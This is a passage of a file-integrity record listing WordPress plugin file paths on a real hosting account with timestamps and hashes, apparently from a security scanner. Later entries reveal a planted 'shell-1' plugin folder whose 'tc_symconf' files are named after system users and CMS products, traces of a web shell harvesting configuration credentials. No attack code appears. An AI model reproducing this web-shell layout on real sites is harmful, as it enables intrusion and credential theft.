home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/responsive\\/responsive.php\":{\"d\":1545638477,\"h\":\"90c48045430e1b2be9ab077a2601f528\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/document-types\\/post.php\":{\"d\":1545638477,\"h\":\"94037fe7902a86eb0e255a7188b571f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/css\\/post-preview.php\":{\"d\":1545638477,\"h\":\"541549f2df584f2f42ce235bb65da4f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/css\\/post.php\":{\"d\":1545638477,\"h\":\"ffd7d4b96ede2ad627d267dff87fa8ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/css\\/global-css.php\":{\"d\":1545638477,\"h\":\"211507d3c4a5f8fa2a003b5cf0139bf3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/css\\/base.php\":{\"d\":1545638477,\"h\":\"172623742844271fc7c716abf78d2581\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/manager.php\":{\"d\":1545638477,\"h\":\"0ab3154c9f50fb91ef594db12784218f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/files\\/base.php\":{\"d\":1545638477,\"h\":\"3209dc1631c5575bd8a56899b78bab14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/admin\\/admin.php\":{\"d\":1545638477,\"h\":\"0528c5663540ab4416bfe08459f80688\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/admin\\/feedback.php\":{\"d\":1545638477,\"h\":\"540c94456ecca461e5418b19b8b9d6ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/create.php\":{\"d\":1545638477,\"h\":\"ed6c4d2a13be9760052b0b7e93e826f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/edit.php\":{\"d\":1545638477,\"h\":\"8983454bdd297ee93bbe7c9e7dd4862a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/tools.php\":{\"d\":1545638477,\"h\":\"075b95de209d9fd5fa4ceccb5e37ea30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/site.php\":{\"d\":1545638477,\"h\":\"154e5e3333541144c498afbd0c0eba1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/settings.php\":{\"d\":1545638477,\"h\":\"dfb104eb9ab5f963134bbc83a9e18bf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories\\/general.php\":{\"d\":1545638477,\"h\":\"5c9312761ca7518049dba7ff7337a509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/module.php\":{\"d\":1545638477,\"h\":\"d23036bbdaf1261497289f72ed1b34d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/base-category.php\":{\"d\":1545638477,\"h\":\"5a8e66db993ca7be9f63129a07ab96e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/template.php\":{\"d\":1545638477,\"h\":\"e54c00d34be8e87742bd3716489c31e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/finder\\/categories-manager.php\":{\"d\":1545638477,\"h\":\"f7ee0a815d5947c709bc981bda150238\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/apps\\/connect.php\":{\"d\":1545638477,\"h\":\"173de924dbc2b6f0d3864ce04eb3092e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/apps\\/base-user-app.php\":{\"d\":1545638477,\"h\":\"03a09528fab295adc16072e5e6509f83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/apps\\/common-app.php\":{\"d\":1545638477,\"h\":\"1f888cb38bf3a4f6f100ae782ef2be8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/apps\\/base-app.php\":{\"d\":1545638477,\"h\":\"da31e21eeb744acf3539a676c918d37f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/module.php\":{\"d\":1545638477,\"h\":\"c349b185b34307875815d09d8ce29861\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/connect\\/admin.php\":{\"d\":1545638477,\"h\":\"413bff5bdb86c70f1f8e016e78de1431\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/modules\\/ajax\\/module.php\":{\"d\":1545638477,\"h\":\"fccd26ea5a1644b22e1f1b05bfb7a74f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/common\\/app.php\":{\"d\":1545638477,\"h\":\"053e555361ea21e55291a087bc8079a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/utils\\/exceptions.php\":{\"d\":1545638477,\"h\":\"1710205640168de351a854a8996c08ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/base\\/base-object.php\":{\"d\":1545638477,\"h\":\"178cc9db41eb2ecdda2475e1851c9bf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/base\\/document.php\":{\"d\":1545638477,\"h\":\"e8d7187d656ed7c6820ddb3baa2876bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/base\\/module.php\":{\"d\":1545638477,\"h\":\"990239461bb2d019e492f959e6554d9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/base\\/app.php\":{\"d\":1545638477,\"h\":\"2915c5be0db0a2d3c1c09c53218621a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/role-manager\\/role-manager.php\":{\"d\":1545638477,\"h\":\"e7f442934df2aa2462a559913c15c741\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/page\\/model.php\":{\"d\":1545638477,\"h\":\"cfc89df340c6997670b522e745d74b17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/page\\/manager.php\":{\"d\":1545638477,\"h\":\"65ee5e2d7c9585354336833d3f8487d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/base\\/model.php\":{\"d\":1545638477,\"h\":\"54caf2de8ea1a81551e8c84bd31303f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/base\\/manager.php\":{\"d\":1545638477,\"h\":\"ecdd411453a6781b2cac9b6c7d103296\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/general\\/model.php\":{\"d\":1545638477,\"h\":\"a95b9ebf4dadb563ef817f77c8d9285b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/general\\/manager.php\":{\"d\":1545638477,\"h\":\"4f4972297f5fa94a672941075248e79d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/settings\\/manager.php\":{\"d\":1545638477,\"h\":\"2194850d486083a872a0b7b54dba0b37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/debug\\/inspector.php\":{\"d\":1545638477,\"h\":\"6910d7a8d9b5fc1d01703d519c06566c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/documents-manager.php\":{\"d\":1545638477,\"h\":\"7d00d5b6bdf631d10c7aa2e2045d7618\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/modules-manager.php\":{\"d\":1545638477,\"h\":\"23be3c0cda4e294633f82ce8271330e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/license.txt\":{\"d\":1545638473,\"h\":\"d32239bcb673463ab874e80d47fae504\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/readme.txt\":{\"d\":1545638477,\"h\":\"fffb508afb9d088db1066d45f24ffed6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/elementor.php\":{\"d\":1545638477,\"h\":\"8c0ce8323b5bc2643521dc519bb2b61d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/assets\\/scss\\/style.scss\":{\"d\":1544490840,\"h\":\"98f5e53ad4535b977a8f47a0776175ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/assets\\/js\\/importer.js\":{\"d\":1544490840,\"h\":\"00a59c70ac19a09b9cd717e2a126cffd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/merlin-wp\\/includes\\/class-merlin-importer.php\":{\"d\":1544490840,\"h\":\"6771bbd9712d15be4452eda2d037142b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/merlin-wp\\/includes\\/class-merlin-helper.php\":{\"d\":1544490840,\"h\":\"ed6d415956c6f9db0f7123ac6ec34f6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/merlin-wp\\/includes\\/class-merlin-xml-parser.php\":{\"d\":1544490840,\"h\":\"3bb529fad10239381b2ec1fc7a144b49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/class-dashboard.php\":{\"d\":1544490840,\"h\":\"5cf6c3811c6e14e45de471c2aeb22a94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/class-tgm-plugin-activation.php\":{\"d\":1544490840,\"h\":\"c307c0b723173e849e441987bfe12f3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/theme-supports.php\":{\"d\":1544490840,\"h\":\"f7c34071f6499c0f6029dcc84e8a8650\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/inc\\/class-progress.php\":{\"d\":1544490840,\"h\":\"f7c8882b4c7bb72b87283ad359b9adeb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/style.css\":{\"d\":1544490840,\"h\":\"cc98fda8ea5d129a0cd2f10ad011de4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/readme.md\":{\"d\":1544490840,\"h\":\"d8873913fe9a29254323541e19c2816e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/famethemes-demo-importer.php\":{\"d\":1544490840,\"h\":\"cf2071db1e848a2ea2561f50a5a04cc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/famethemes-demo-importer\\/readme.txt\":{\"d\":1544490840,\"h\":\"13d600c86e2f78eea1ecb7d4153144fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/index.php\":{\"d\":1401974954,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root\":{\"d\":1545963104,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-conten